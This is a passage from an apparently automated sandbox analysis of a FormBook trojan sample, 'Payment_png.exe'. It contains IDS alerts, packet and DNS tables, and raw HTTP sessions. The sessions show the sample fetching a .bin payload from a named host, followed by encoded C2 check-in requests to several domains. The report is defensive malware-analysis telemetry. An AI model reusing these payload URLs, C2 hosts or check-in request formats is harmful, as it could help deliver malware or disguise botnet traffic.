03/29/21-13:59:32.253784 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 172.67.184.37
03/29/21-13:59:32.253784 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 172.67.184.37
03/29/21-13:59:37.759049 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.3 | 35.246.6.109
03/29/21-13:59:37.759049 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.3 | 35.246.6.109
03/29/21-13:59:37.759049 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.3 | 35.246.6.109
03/29/21-13:59:42.981524 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 217.160.0.233
03/29/21-13:59:42.981524 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 217.160.0.233
03/29/21-13:59:42.981524 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 217.160.0.233
03/29/21-13:59:53.620903 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 23.227.38.32
03/29/21-13:59:53.620903 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 23.227.38.32
03/29/21-13:59:53.620903 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 23.227.38.32
03/29/21-13:59:53.792627 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49742 | 23.227.38.32 | 192.168.2.3
03/29/21-14:00:09.372027 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49743 | 34.102.136.180 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2021 13:58:28.539237976 CEST | 49712 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:28.674309969 CEST | 80 | 49712 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:28.674395084 CEST | 49712 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:28.675035000 CEST | 49712 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:28.809909105 CEST | 80 | 49712 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:28.811625957 CEST | 80 | 49712 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:28.811692953 CEST | 49712 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:28.993220091 CEST | 49713 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.129069090 CEST | 80 | 49713 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.130745888 CEST | 49713 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.131409883 CEST | 49713 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.268816948 CEST | 80 | 49713 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.270570040 CEST | 80 | 49713 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.270664930 CEST | 49713 | 80 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.277507067 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.412364006 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.414856911 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.435201883 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.570220947 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.570487022 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.570508957 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.570549965 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.570565939 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.570672989 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.570724964 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.570738077 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.576385975 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.576472044 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.681586027 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.821729898 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.822938919 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.838079929 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.985810041 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985831022 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985848904 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985866070 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985881090 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985894918 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985913038 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985928059 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985937119 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.985939980 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985959053 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:29.985985994 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.985992908 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.985999107 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.986002922 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:29.986120939 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121068954 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121112108 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121124029 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121136904 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121149063 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121160030 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121244907 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121305943 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121356010 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121362925 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121423960 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121444941 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121460915 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121490002 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121512890 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121520996 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121706963 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121766090 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121871948 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121890068 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121903896 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.121933937 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.121957064 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.122147083 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.122204065 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.122302055 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.122318029 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.122333050 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.122359037 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.122376919 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.122622967 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.122641087 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.122679949 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.122704029 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.256247997 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256272078 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256283998 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256298065 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256309986 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256339073 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256453037 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256511927 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.256527901 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256570101 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.256577015 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.256581068 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.256609917 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256653070 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256666899 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.256709099 CEST | 49714 | 443 | 192.168.2.3 | 170.249.199.106
Mar 29, 2021 13:58:30.256777048 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3
Mar 29, 2021 13:58:30.256813049 CEST | 443 | 49714 | 170.249.199.106 | 192.168.2.3

                                                          UDP Packets


                                                          DNS Queries

                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                          Mar 29, 2021 13:58:28.343625069 CEST | 192.168.2.3 | 8.8.8.8 | 0xbb4d | Standard query (0) | aps-mm.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:58:28.821455002 CEST | 192.168.2.3 | 8.8.8.8 | 0xa416 | Standard query (0) | www.aps-mm.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:15.812453032 CEST | 192.168.2.3 | 8.8.8.8 | 0x1584 | Standard query (0) | www.plowbrothers.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:21.130537033 CEST | 192.168.2.3 | 8.8.8.8 | 0x43a | Standard query (0) | www.slutefuter.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.464684963 CEST | 192.168.2.3 | 8.8.8.8 | 0x77dc | Standard query (0) | www.loversdeal.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:32.034113884 CEST | 192.168.2.3 | 8.8.8.8 | 0xd2ca | Standard query (0) | www.booksfall.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:37.574982882 CEST | 192.168.2.3 | 8.8.8.8 | 0x8448 | Standard query (0) | www.pcpartout.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:42.869838953 CEST | 192.168.2.3 | 8.8.8.8 | 0xd02a | Standard query (0) | www.birkenhof-allgaeu.net | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:48.076154947 CEST | 192.168.2.3 | 8.8.8.8 | 0x1385 | Standard query (0) | www.choupisson.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:53.513850927 CEST | 192.168.2.3 | 8.8.8.8 | 0x4e8a | Standard query (0) | www.uforservice.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:58.811161041 CEST | 192.168.2.3 | 8.8.8.8 | 0x2170 | Standard query (0) | www.domennyarendi39.net | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 14:00:03.900238037 CEST | 192.168.2.3 | 8.8.8.8 | 0x184f | Standard query (0) | www.accinf5.com | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 14:00:09.069717884 CEST | 192.168.2.3 | 8.8.8.8 | 0xdb28 | Standard query (0) | www.silverdollarcafe.com | A (IP address) | IN (0x0001)

                                                          DNS Answers

                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                          Mar 29, 2021 13:58:28.516680956 CEST | 8.8.8.8 | 192.168.2.3 | 0xbb4d | No error (0) | aps-mm.com | | 170.249.199.106 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:58:28.991142035 CEST | 8.8.8.8 | 192.168.2.3 | 0xa416 | No error (0) | www.aps-mm.com | aps-mm.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:58:28.991142035 CEST | 8.8.8.8 | 192.168.2.3 | 0xa416 | No error (0) | aps-mm.com | | 170.249.199.106 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:10.145376921 CEST | 8.8.8.8 | 192.168.2.3 | 0x552a | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:15.880345106 CEST | 8.8.8.8 | 192.168.2.3 | 0x1584 | No error (0) | www.plowbrothers.com | plowbrothers.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:15.880345106 CEST | 8.8.8.8 | 192.168.2.3 | 0x1584 | No error (0) | plowbrothers.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:21.452011108 CEST | 8.8.8.8 | 192.168.2.3 | 0x43a | Server failure (2) | www.slutefuter.com | none | none | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | www.loversdeal.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:26.610491037 CEST | 8.8.8.8 | 192.168.2.3 | 0x77dc | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:32.202716112 CEST | 8.8.8.8 | 192.168.2.3 | 0xd2ca | No error (0) | www.booksfall.com | www.booksfall.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST | 8.8.8.8 | 192.168.2.3 | 0x8448 | No error (0) | www.pcpartout.com | www197.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST | 8.8.8.8 | 192.168.2.3 | 0x8448 | No error (0) | www197.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST | 8.8.8.8 | 192.168.2.3 | 0x8448 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST | 8.8.8.8 | 192.168.2.3 | 0x8448 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:37.686423063 CEST | 8.8.8.8 | 192.168.2.3 | 0x8448 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:42.936120987 CEST | 8.8.8.8 | 192.168.2.3 | 0xd02a | No error (0) | www.birkenhof-allgaeu.net | | 217.160.0.233 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:48.231761932 CEST | 8.8.8.8 | 192.168.2.3 | 0x1385 | No error (0) | www.choupisson.com | | 66.96.160.133 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:53.579756021 CEST | 8.8.8.8 | 192.168.2.3 | 0x4e8a | No error (0) | www.uforservice.com | uforservice.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 13:59:53.579756021 CEST | 8.8.8.8 | 192.168.2.3 | 0x4e8a | No error (0) | uforservice.com | | 23.227.38.32 | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 13:59:58.890744925 CEST | 8.8.8.8 | 192.168.2.3 | 0x2170 | Name error (3) | www.domennyarendi39.net | none | none | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 14:00:04.060530901 CEST | 8.8.8.8 | 192.168.2.3 | 0x184f | Name error (3) | www.accinf5.com | none | none | A (IP address) | IN (0x0001)
                                                          Mar 29, 2021 14:00:09.134391069 CEST | 8.8.8.8 | 192.168.2.3 | 0xdb28 | No error (0) | www.silverdollarcafe.com | silverdollarcafe.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Mar 29, 2021 14:00:09.134391069 CEST | 8.8.8.8 | 192.168.2.3 | 0xdb28 | No error (0) | silverdollarcafe.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • aps-mm.com
                                                          • www.aps-mm.com
                                                          • www.plowbrothers.com
                                                          • www.loversdeal.com
                                                          • www.pcpartout.com
                                                          • www.birkenhof-allgaeu.net
                                                          • www.choupisson.com
                                                          • www.uforservice.com
                                                          • www.silverdollarcafe.com

                                                          HTTP Packets

                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          0 | 192.168.2.3 | 49712 | 170.249.199.106 | 80 | C:\Users\user\Desktop\Payment_png.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 13:58:28.675035000 CEST | 290 | OUT | GET /bin_BNUtTDfY243.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: aps-mm.com
                                                          Cache-Control: no-cache
                                                          Mar 29, 2021 13:58:28.811625957 CEST | 291 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Mon, 29 Mar 2021 11:58:28 GMT
                                                          Server: Apache
                                                          Location: http://www.aps-mm.com/bin_BNUtTDfY243.bin
                                                          Content-Length: 249
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.aps-mm.com/bin_BNUtTDfY243.bin">here</a>.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          1 | 192.168.2.3 | 49713 | 170.249.199.106 | 80 | C:\Users\user\Desktop\Payment_png.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 13:58:29.131409883 CEST | 292 | OUT | GET /bin_BNUtTDfY243.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Cache-Control: no-cache
                                                          Host: www.aps-mm.com
                                                          Connection: Keep-Alive
                                                          Mar 29, 2021 13:58:29.270570040 CEST | 292 | IN | HTTP/1.1 302 Found
                                                          Date: Mon, 29 Mar 2021 11:58:29 GMT
                                                          Server: Apache
                                                          Location: https://www.aps-mm.com/bin_BNUtTDfY243.bin
                                                          Content-Length: 226
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.aps-mm.com/bin_BNUtTDfY243.bin">here</a>.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          2 | 192.168.2.3 | 49734 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 13:59:15.924201012 CEST | 4022 | OUT | GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.plowbrothers.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:16.123061895 CEST | 4023 | IN | HTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 29 Mar 2021 11:59:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "606189d6-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          3 | 192.168.2.3 | 49735 | 198.54.117.218 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 13:59:26.801275015 CEST | 4879 | OUT | GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.loversdeal.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          4 | 192.168.2.3 | 49737 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 13:59:37.759048939 CEST | 4882 | OUT | GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.pcpartout.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:37.861877918 CEST | 4883 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Mon, 29 Mar 2021 11:59:37 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          location: https://www.pcpartout.com/c8bs?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c%2F5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp
                                                          strict-transport-security: max-age=120
                                                          x-wix-request-id: 1617019177.80584040510711231
                                                          Age: 0
                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjiVMoGgJZPyIJpdYBUTBrV,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalvfZD7TLdGiEhML9WpD1EDCGLdCQN31ePkoJDRNIDPa3GgqFbFMYwiXnFojPwdof6CrAvUe7erS/8UkenfHSRWs=,2UNV7KOq4oGjA5+PKsX47FoxTR+xW4dT2i2c322L5wc=,LXlT8qjS5x6WBejJA3+gBYyEjTvzigG4XLss7FD8eEGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9bmvtgOsMBj+rhOGTJK8foYtDIPVQKjbBTecFiwGIGNvOTD8KsDugQppFc8+khY5muOkfcTSJaUOHlD2KQbqrA==
                                                          Cache-Control: no-cache
                                                          Server: Pepyaka/1.19.0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          5 | 192.168.2.3 | 49738 | 217.160.0.233 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 29, 2021 13:59:42.981523991 CEST | 4884 | OUT | GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1
                                                          Host: www.birkenhof-allgaeu.net
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 29, 2021 13:59:43.026885033 CEST | 4885 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Mon, 29 Mar 2021 11:59:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          6 | 192.168.2.3 | 49741 | 66.96.160.133 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
